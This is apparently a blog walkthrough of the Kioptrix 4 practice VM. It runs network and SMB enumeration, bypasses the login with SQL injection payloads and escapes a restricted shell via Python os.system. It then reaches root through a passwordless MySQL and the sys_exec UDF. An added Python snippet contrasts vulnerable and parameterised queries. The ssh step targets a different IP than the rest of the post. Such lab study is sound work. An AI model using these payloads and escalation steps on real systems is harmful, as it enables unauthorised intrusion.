Saturday, March 30, 2019

Kioptrix4

# Host discovery and service enumeration
netdiscover -r 192.168.0.0/24
nmap -sS -sV -T4 -AO 192.168.0.4
nikto -host 192.168.0.4 -port 80 -output kioptrix4.html
# SMB enumeration (users and shares)
enum4linux -a 192.168.0.4 | tee e4l.txt
nmap --script smb-enum-users 192.168.0.4 -oA nmapenumusers.txt
nmap --script smb-enum-shares 192.168.0.4 -oA nmapenumshares.txt
# Web directory brute force
dirb http://192.168.0.4 /usr/share/wordlists/dirb/common.txt | tee dirb.txt
vi dirb.txt
Knowing from the dirb results that a john directory existed, I opened john/john.php directly in the browser.

Using the manual process to determine whether the web site was vulnerable to SQL injection, I simply added a single quote (') to the Username and Password fields and then clicked the Login button.
Interestingly, this revealed that a MySQL database was in use and that the form was handled by the page checklogin.php.
Next, I decided to use the SMB usernames discovered earlier together with one of the following SQL injection payloads in the Password field:
blah' OR 1 = 1 -- -
or
'OR'1'='1
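To show why the login bypass above works and what the fix looks like, here is an added example (not code from the original post or from the Kioptrix VM): a login check written the vulnerable way beside a parameterised one, run against an in-memory SQLite table whose schema, usernames and passwords are constructed stand-ins for the real MySQL members table.

```python
import sqlite3

# Constructed sample rows standing in for the VM's members table (assumed schema).
USERS = [("john", "s3cret"), ("robert", "pa55word")]


def _db():
    """Build a throwaway in-memory database seeded with the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """The pattern the write-up exploited: user input pasted into the SQL text.

    A quote in the password closes the string literal, so `' OR 1 = 1 -- -`
    turns the WHERE clause into one that is true for every row.
    """
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: values travel separately from the SQL text, so a
    quote or comment marker in the input can never change the query structure.
    (A real fix would also store password hashes, not cleartext passwords.)
    """
    sql = "SELECT username FROM members WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    for payload in ("blah' OR 1 = 1 -- -", "'OR'1'='1"):
        print(repr(payload),
              "vulnerable ->", login_vulnerable(_db(), "john", payload),
              "| safe ->", login_safe(_db(), "john", payload))
```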
 
ssh john@192.168.0.3
The account only had a limited (restricted) shell.
 
Knowing that Python was usually installed on Ubuntu by default, I decided to play around with the following example from the SANS documentation:
python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read()
After some time, I issued the echo command with the system function of the Python os module in order to call /bin/bash:
echo os.system('/bin/bash');
I tried sudo su, but no luck.
cat /var/www/checklogin.php
This showed that the MySQL root password was empty (null).
I then checked whether MySQL was running as root or under a different credential:
ps -ef | grep mysql
It was running as root.
MySQL supports User-Defined Functions (UDF). So, I issued the locate udf command to see whether a UDF library was already installed on the system.


mysql -u root
select * from mysql.func;
select sys_exec('usermod -a -G admin john');
exit
sudo su
Boom... you have root!!

Finally, read the flag: cat /root/congrats.txt
